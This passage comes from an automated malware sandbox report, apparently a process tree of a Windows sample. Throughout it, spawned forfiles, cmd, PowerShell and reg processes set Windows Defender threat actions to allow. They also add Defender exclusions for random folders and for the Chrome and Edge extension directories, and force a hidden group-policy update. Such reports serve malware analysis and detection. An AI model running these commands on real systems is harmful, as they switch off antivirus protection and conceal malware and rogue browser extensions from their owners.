                                                                                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:3728
                                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                          forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:1144
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:3744
                                                                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                    PID:5012
                                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:3824
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:4176
                                                                                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                          PID:4740
                                                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:1568
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:1964
                                                                                                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                PID:3296
                                                                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                            forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:4620
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                  PID:3248
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                    PID:4328
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                        PID:2504
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:2696
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:3744
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                          PID:4912
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:1320
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:3728
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:4960
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:1448
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:4476
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:1840
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:3256
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:3356
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:4996
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:2076
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:4508
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:4176
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:4564
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:3744
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:4984
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:2132
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:4568
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:1480
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:652
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:1528
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:2248
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                    PID:680
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:3896
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                        PID:4284
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                          PID:1660
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                            PID:4368
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                              PID:5020
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                            powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                              PID:1900
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                  PID:1492
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                      PID:1192
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                      PID:4444
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                        PID:4016
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                          PID:1468
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                            PID:3896
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                              PID:2476
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                PID:3984
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                  PID:4188
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                    PID:4368
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                      PID:1080
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                        PID:4292
